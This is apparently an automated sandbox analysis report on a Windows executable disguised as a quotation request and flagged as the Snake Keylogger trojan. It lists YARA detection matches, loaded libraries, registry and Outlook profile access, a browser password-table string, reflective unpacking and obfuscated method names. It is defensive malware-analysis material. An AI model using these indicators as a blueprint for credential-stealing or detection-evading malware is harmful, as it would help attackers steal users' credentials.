Source: 1.2.Request for Quotation Plug Valve.exe.3839970.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 1.2.Request for Quotation Plug Valve.exe.3839970.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000003.00000002.4703404877.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000001.00000002.2250478185.0000000003839000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: Request for Quotation Plug Valve.exe PID: 6620, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: Request for Quotation Plug Valve.exe PID: 6456, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23

Source: Request for Quotation Plug Valve.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 1.2.Request for Quotation Plug Valve.exe.387c990.2.raw.unpack, ---.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 1.2.Request for Quotation Plug Valve.exe.387c990.2.raw.unpack, -tj-.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 1.2.Request for Quotation Plug Valve.exe.387c990.2.raw.unpack, -tj-.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 1.2.Request for Quotation Plug Valve.exe.3839970.4.raw.unpack, ---.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 1.2.Request for Quotation Plug Valve.exe.3839970.4.raw.unpack, -tj-.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 1.2.Request for Quotation Plug Valve.exe.3839970.4.raw.unpack, -tj-.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: 1.2.Request for Quotation Plug Valve.exe.6d70000.5.raw.unpack, NsTPTGXblfc3bcgyRi.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 1.2.Request for Quotation Plug Valve.exe.3a7b460.3.raw.unpack, NsTPTGXblfc3bcgyRi.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 1.2.Request for Quotation Plug Valve.exe.6d70000.5.raw.unpack, oVQmUjFt7ORJGqy8CL.cs	Security API names: _0020.SetAccessControl
Source: 1.2.Request for Quotation Plug Valve.exe.6d70000.5.raw.unpack, oVQmUjFt7ORJGqy8CL.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 1.2.Request for Quotation Plug Valve.exe.6d70000.5.raw.unpack, oVQmUjFt7ORJGqy8CL.cs	Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: 1.2.Request for Quotation Plug Valve.exe.3a7b460.3.raw.unpack, oVQmUjFt7ORJGqy8CL.cs	Security API names: _0020.SetAccessControl
Source: 1.2.Request for Quotation Plug Valve.exe.3a7b460.3.raw.unpack, oVQmUjFt7ORJGqy8CL.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 1.2.Request for Quotation Plug Valve.exe.3a7b460.3.raw.unpack, oVQmUjFt7ORJGqy8CL.cs	Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@3/1@5/4

Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Request for Quotation Plug Valve.exe.log

Jump to behavior

Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe

Mutant created: NULL

Source: Request for Quotation Plug Valve.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: Request for Quotation Plug Valve.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%

Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Request for Quotation Plug Valve.exe, 00000003.00000002.4707717001.0000000002E42000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation Plug Valve.exe, 00000003.00000002.4707717001.0000000002E92000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation Plug Valve.exe, 00000003.00000002.4707717001.0000000002E52000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation Plug Valve.exe, 00000003.00000002.4707717001.0000000002E85000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation Plug Valve.exe, 00000003.00000002.4707717001.0000000002E60000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: Request for Quotation Plug Valve.exe

ReversingLabs: Detection: 55%

Source: unknown	Process created: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe "C:\Users\user\Desktop\Request for Quotation Plug Valve.exe"
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Process created: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe "C:\Users\user\Desktop\Request for Quotation Plug Valve.exe"
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Process created: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe "C:\Users\user\Desktop\Request for Quotation Plug Valve.exe"	Jump to behavior

Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Section loaded: dpapi.dll	Jump to behavior

Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: Request for Quotation Plug Valve.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: Request for Quotation Plug Valve.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

.NET source code contains potential unpacker

Source: 1.2.Request for Quotation Plug Valve.exe.28b0e20.0.raw.unpack, RZ.cs	.Net Code: System.Reflection.Assembly.Load(byte[])
Source: 1.2.Request for Quotation Plug Valve.exe.3a7b460.3.raw.unpack, oVQmUjFt7ORJGqy8CL.cs	.Net Code: HpsOfk9eaI System.Reflection.Assembly.Load(byte[])
Source: 1.2.Request for Quotation Plug Valve.exe.2978f54.1.raw.unpack, RZ.cs	.Net Code: System.Reflection.Assembly.Load(byte[])
Source: 1.2.Request for Quotation Plug Valve.exe.6d70000.5.raw.unpack, oVQmUjFt7ORJGqy8CL.cs	.Net Code: HpsOfk9eaI System.Reflection.Assembly.Load(byte[])
Source: 1.2.Request for Quotation Plug Valve.exe.7630000.6.raw.unpack, RZ.cs	.Net Code: System.Reflection.Assembly.Load(byte[])

Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Code function: 1_2_00E846AB push edx; iretd	1_2_00E846AE
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Code function: 1_2_00E846AF push edx; iretd	1_2_00E846B2
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Code function: 1_2_00E84658 push edx; iretd	1_2_00E8465A
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Code function: 1_2_00E847A8 push esi; iretd	1_2_00E847AA
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Code function: 1_2_00E847A0 push esi; iretd	1_2_00E847A2
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Code function: 1_2_00E84769 push esi; iretd	1_2_00E8476A
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Code function: 1_2_00E8476B push esi; iretd	1_2_00E84772
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Code function: 1_2_00E85E50 push esp; ret	1_2_00E85E69
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Code function: 1_2_00E85F18 push esp; iretw	1_2_00E860F9
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Code function: 1_2_07654CAA pushfd ; iretd	1_2_07654CB9
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Code function: 1_2_07654BFB push eax; iretd	1_2_07654C01

Source: Request for Quotation Plug Valve.exe

Static PE information: section name: .text entropy: 7.779225466224072

Source: 1.2.Request for Quotation Plug Valve.exe.3a7b460.3.raw.unpack, CeiqZFJnjhjlj2cBvu.cs	High entropy of concatenated method names: 'bUMylNlVVM', 'x3OyVOuS7J', 'WDXJWrCcto', 'JhZJPgsuwK', 'Ts3ya2EM18', 'TOuyvH0Axd', 'IuGyUfH72Z', 'GDgyqnskEx', 'F4NywcHowy', 'N67yiAkgQx'
Source: 1.2.Request for Quotation Plug Valve.exe.3a7b460.3.raw.unpack, cTlpfSZPcGGb8QSBmh.cs	High entropy of concatenated method names: 'DYobxJrZWB', 'bJAbXYvy3U', 't3NbgOE8ib', 'ypfbeL4uPE', 'xpibs5FPZf', 'yJ3gCfqC23', 'sMrgYryyK5', 'JVtg7ed1uw', 'PG1glZWZ7N', 'ImDgFVndt6'
Source: 1.2.Request for Quotation Plug Valve.exe.3a7b460.3.raw.unpack, oVQmUjFt7ORJGqy8CL.cs	High entropy of concatenated method names: 'K3BcxgbO5t', 'EiochYKP2v', 'lWgcX8gGHJ', 'yTec6QE81V', 'D1EcgxpjXj', 'Dcrcbj98vx', 'RdLceHmlql', 'p6lcsDZjMx', 'amAc8WvOl3', 'RX5cIIOVii'
Source: 1.2.Request for Quotation Plug Valve.exe.3a7b460.3.raw.unpack, YH309kapuiU1loYtcC.cs	High entropy of concatenated method names: 'Dispose', 'A9SPFwACj6', 'gEIESZuSuC', 'e2KTTHmGEk', 'QduPVG1Jj3', 'rtoPzkjWbB', 'ProcessDialogKey', 'FKDEWRVEqs', 'YRHEPes1tT', 'XnxEEegYaK'
Source: 1.2.Request for Quotation Plug Valve.exe.3a7b460.3.raw.unpack, lU5lEl3MGZXcKSUE4O.cs	High entropy of concatenated method names: 'VmjBPPJDRr', 'uITBcQl81L', 's9xBO25EpR', 'g0bBhLkjJ6', 'DH5BX5hMmE', 'wAxBgiJX1X', 'WKwBb8HHyr', 'I6qJ7wu7bR', 'El1JlMa25n', 'KqSJFVqkwl'
Source: 1.2.Request for Quotation Plug Valve.exe.3a7b460.3.raw.unpack, vJ6Uos4UDSBTKeNs84T.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'vyw9qjYEVa', 'ftP9wUyLrg', 'tdA9icp2E5', 'hvI90Rylm1', 'tdb9CYwcHT', 'p0E9YnRaQG', 'vJD97WCxnX'
Source: 1.2.Request for Quotation Plug Valve.exe.3a7b460.3.raw.unpack, AEAUQAHGZWuYo2haO1.cs	High entropy of concatenated method names: 'tBDJhUa8hC', 'bmgJXgnva1', 'iMgJ60FxKB', 'sBPJgfVLOQ', 'yDsJbKMK1o', 'dI7JebT5Au', 'k8KJsp8Swu', 'QhxJ8dMXNj', 'jNFJIDGMmD', 'YLWJKEK3a1'
Source: 1.2.Request for Quotation Plug Valve.exe.3a7b460.3.raw.unpack, kVPHenoYhRnvx7ByvG.cs	High entropy of concatenated method names: 'HnXfaim56', 'Dy0MRalou', 'hwxuvn95L', 'o592I5961', 'ltrNo13pt', 'BH7ofi2JL', 'sGbaNHToPaFAB1nHMA', 'nW0qNRHVC4YwtGg2r2', 'TAZJyU9xG', 'j2e9RBuJr'
Source: 1.2.Request for Quotation Plug Valve.exe.3a7b460.3.raw.unpack, Obwg8344cKx8Vq6cYYO.cs	High entropy of concatenated method names: 'ToString', 'VKy9c2XhDN', 'dLd9Ogcpuo', 'fa39x3PJJQ', 'jup9hNfrY9', 'M819X4HP4A', 'iiU96afwxN', 'KPL9giaOZs', 'PVrSDetzrED2KLdlOSX', 'oRcB1ZXnNqjKj0Zytt4'
Source: 1.2.Request for Quotation Plug Valve.exe.3a7b460.3.raw.unpack, gcOxdHzlMpDRkp3foS.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'HaNBLoLNRc', 'LOWB5qQPov', 'RXKBnmlY3F', 'mnjByoVPF9', 'li9BJns7df', 'FxVBB0g9EA', 'sf1B96JQoB'
Source: 1.2.Request for Quotation Plug Valve.exe.3a7b460.3.raw.unpack, mX5lZQf14Y4vmHBl6g.cs	High entropy of concatenated method names: 'Xxu6MpDkb2', 'BKa6uWnccw', 'tsh6HkDxPa', 'bd06N1e7se', 'bYQ65dGVw0', 'C2y6nlOymW', 'uII6ykdFuk', 'TGW6JZRJJ2', 'oTN6BGbXah', 'Q7Z69mC8Oo'
Source: 1.2.Request for Quotation Plug Valve.exe.3a7b460.3.raw.unpack, tubn9U6Xcr3rV2SkV9.cs	High entropy of concatenated method names: 'pOiCn930DUG3HcPSxhF', 'hZmgID3Ke4jVvYo1g4S', 'oiJFe73ypgg38y58F52', 'adcbJkq9lW', 'huMbBsivuq', 'uNnb95bhfA', 'XltUF43JeZKnVEcYQTE', 'ok2KX43VlcICqXVJdog'
Source: 1.2.Request for Quotation Plug Valve.exe.3a7b460.3.raw.unpack, NsTPTGXblfc3bcgyRi.cs	High entropy of concatenated method names: 'JAKXq33Syo', 'FPXXwG3TqH', 'f46XiqUFUT', 'R8lX0LiQ1o', 'AoJXChijY7', 'f5lXYE2eAL', 'bKnX7dKB07', 'lLBXlj1YGX', 'tdrXFpZG7x', 'PIlXVikMST'
Source: 1.2.Request for Quotation Plug Valve.exe.3a7b460.3.raw.unpack, WleXrMrsrxEvCFlsrq.cs	High entropy of concatenated method names: 'mgIJk5p6UK', 'jAqJSf7HjK', 'DUEJDtD2v3', 'xIIJG1jJm0', 'hj1JqSgi5j', 'gCxJQFRavc', 'Next', 'Next', 'Next', 'NextBytes'
Source: 1.2.Request for Quotation Plug Valve.exe.3a7b460.3.raw.unpack, pq44S94bFJCMmq3UOsM.cs	High entropy of concatenated method names: 'WA6B1clu0v', 'BrUBrOeOmS', 'BdoBfktrsY', 'vgiBMM8Iug', 'O5FB3maIhW', 'LByBuyYeMQ', 'BRMB2FtklK', 'FuSBHmjKkO', 'oOdBNlB58t', 'gOyBoSC0j7'
Source: 1.2.Request for Quotation Plug Valve.exe.3a7b460.3.raw.unpack, XNdSwjvdB2jmw6APpF.cs	High entropy of concatenated method names: 'RNcLH4elE2', 'InyLNvEquf', 'kq3LkQfkPt', 'EQJLSUdo3u', 'QZtLGjf6FT', 'PiLLQuIHwk', 'sCuL4bZaPY', 'BprLpc564O', 'yqPLdO5aKD', 'V6WLa5cpQ1'
Source: 1.2.Request for Quotation Plug Valve.exe.3a7b460.3.raw.unpack, rL7WHPq1CmcimKVrpO.cs	High entropy of concatenated method names: 'X1L5dFQUcs', 'fOt5vw4ery', 'hsZ5qGKuUV', 'wdg5wZWLHN', 'YhS5SySmV4', 'HtQ5DkJHNk', 'cMa5GIEsMv', 'nt55Q9mO2N', 'YAj5tGDXOJ', 'HWU54ygL1a'
Source: 1.2.Request for Quotation Plug Valve.exe.3a7b460.3.raw.unpack, OGWKdKhWOB85qEo1Jm.cs	High entropy of concatenated method names: 'wWDe1kq2FV', 'p40erWGmj9', 'yPvef1Jix7', 'EMpeMJ7Q67', 'sE2e3nq8S9', 'MD5euR2HFL', 'X0He2ftoOm', 'uOTeHoFlpQ', 'FZ1eNTGu39', 'imSeogfrlb'
Source: 1.2.Request for Quotation Plug Valve.exe.3a7b460.3.raw.unpack, Wu07OfSGKg18tnUm6N.cs	High entropy of concatenated method names: 'Dqvg3TUNDO', 'W9Fg2dLaTt', 'HsJ6DZ910r', 'heY6GJy6ex', 'TfN6Qus0R6', 'ijc6tChNV3', 'bOa64OrgBy', 'wQZ6p7Z6ad', 'z0x6mau2fB', 'JMS6dsGHB4'
Source: 1.2.Request for Quotation Plug Valve.exe.3a7b460.3.raw.unpack, WKSUxJdUAcFBg50a2b.cs	High entropy of concatenated method names: 'pHnbZ8OGDI', 'g2yb1BI8J3', 'FXabfxNW1Z', 'unKbMY3lBi', 'S4lbu6G7HI', 'VROb2h0Rl0', 's3abNAJjkO', 'TCGbo1tv25', 'BahfjH3UXWxS2SRTQ0n', 'sH9Q313wfuEpkwTjAdF'
Source: 1.2.Request for Quotation Plug Valve.exe.3a7b460.3.raw.unpack, QBg919QotU4lls9Qe0.cs	High entropy of concatenated method names: 'RkMPenUGNg', 'ua1PsHTVW7', 'TU8PI3QQIU', 'iibPKhftJH', 'QNSP5GLTaL', 'MPPPn0eqAa', 'jQuZGLleUL45reLpk8', 's089j2AVlluIK6RV4s', 'X4QPPfJBqS', 'PEePc0P6Ra'
Source: 1.2.Request for Quotation Plug Valve.exe.3a7b460.3.raw.unpack, cfuEKp9WUDtA9cTn3a.cs	High entropy of concatenated method names: 'M3qeh2jZ3M', 'CHme61xTEy', 'OyaebPAn8Q', 'kMMbVnO6lA', 'giXbzro6j3', 'qtGeW5oasu', 'PojePvBqG9', 'yO8eE87sGW', 'D3decX2g5s', 'A1MeOgfm2L'
Source: 1.2.Request for Quotation Plug Valve.exe.6d70000.5.raw.unpack, CeiqZFJnjhjlj2cBvu.cs	High entropy of concatenated method names: 'bUMylNlVVM', 'x3OyVOuS7J', 'WDXJWrCcto', 'JhZJPgsuwK', 'Ts3ya2EM18', 'TOuyvH0Axd', 'IuGyUfH72Z', 'GDgyqnskEx', 'F4NywcHowy', 'N67yiAkgQx'
Source: 1.2.Request for Quotation Plug Valve.exe.6d70000.5.raw.unpack, cTlpfSZPcGGb8QSBmh.cs	High entropy of concatenated method names: 'DYobxJrZWB', 'bJAbXYvy3U', 't3NbgOE8ib', 'ypfbeL4uPE', 'xpibs5FPZf', 'yJ3gCfqC23', 'sMrgYryyK5', 'JVtg7ed1uw', 'PG1glZWZ7N', 'ImDgFVndt6'
Source: 1.2.Request for Quotation Plug Valve.exe.6d70000.5.raw.unpack, oVQmUjFt7ORJGqy8CL.cs	High entropy of concatenated method names: 'K3BcxgbO5t', 'EiochYKP2v', 'lWgcX8gGHJ', 'yTec6QE81V', 'D1EcgxpjXj', 'Dcrcbj98vx', 'RdLceHmlql', 'p6lcsDZjMx', 'amAc8WvOl3', 'RX5cIIOVii'
Source: 1.2.Request for Quotation Plug Valve.exe.6d70000.5.raw.unpack, YH309kapuiU1loYtcC.cs	High entropy of concatenated method names: 'Dispose', 'A9SPFwACj6', 'gEIESZuSuC', 'e2KTTHmGEk', 'QduPVG1Jj3', 'rtoPzkjWbB', 'ProcessDialogKey', 'FKDEWRVEqs', 'YRHEPes1tT', 'XnxEEegYaK'
Source: 1.2.Request for Quotation Plug Valve.exe.6d70000.5.raw.unpack, lU5lEl3MGZXcKSUE4O.cs	High entropy of concatenated method names: 'VmjBPPJDRr', 'uITBcQl81L', 's9xBO25EpR', 'g0bBhLkjJ6', 'DH5BX5hMmE', 'wAxBgiJX1X', 'WKwBb8HHyr', 'I6qJ7wu7bR', 'El1JlMa25n', 'KqSJFVqkwl'
Source: 1.2.Request for Quotation Plug Valve.exe.6d70000.5.raw.unpack, vJ6Uos4UDSBTKeNs84T.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'vyw9qjYEVa', 'ftP9wUyLrg', 'tdA9icp2E5', 'hvI90Rylm1', 'tdb9CYwcHT', 'p0E9YnRaQG', 'vJD97WCxnX'
Source: 1.2.Request for Quotation Plug Valve.exe.6d70000.5.raw.unpack, AEAUQAHGZWuYo2haO1.cs	High entropy of concatenated method names: 'tBDJhUa8hC', 'bmgJXgnva1', 'iMgJ60FxKB', 'sBPJgfVLOQ', 'yDsJbKMK1o', 'dI7JebT5Au', 'k8KJsp8Swu', 'QhxJ8dMXNj', 'jNFJIDGMmD', 'YLWJKEK3a1'
Source: 1.2.Request for Quotation Plug Valve.exe.6d70000.5.raw.unpack, kVPHenoYhRnvx7ByvG.cs	High entropy of concatenated method names: 'HnXfaim56', 'Dy0MRalou', 'hwxuvn95L', 'o592I5961', 'ltrNo13pt', 'BH7ofi2JL', 'sGbaNHToPaFAB1nHMA', 'nW0qNRHVC4YwtGg2r2', 'TAZJyU9xG', 'j2e9RBuJr'
Source: 1.2.Request for Quotation Plug Valve.exe.6d70000.5.raw.unpack, Obwg8344cKx8Vq6cYYO.cs	High entropy of concatenated method names: 'ToString', 'VKy9c2XhDN', 'dLd9Ogcpuo', 'fa39x3PJJQ', 'jup9hNfrY9', 'M819X4HP4A', 'iiU96afwxN', 'KPL9giaOZs', 'PVrSDetzrED2KLdlOSX', 'oRcB1ZXnNqjKj0Zytt4'
Source: 1.2.Request for Quotation Plug Valve.exe.6d70000.5.raw.unpack, gcOxdHzlMpDRkp3foS.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'HaNBLoLNRc', 'LOWB5qQPov', 'RXKBnmlY3F', 'mnjByoVPF9', 'li9BJns7df', 'FxVBB0g9EA', 'sf1B96JQoB'
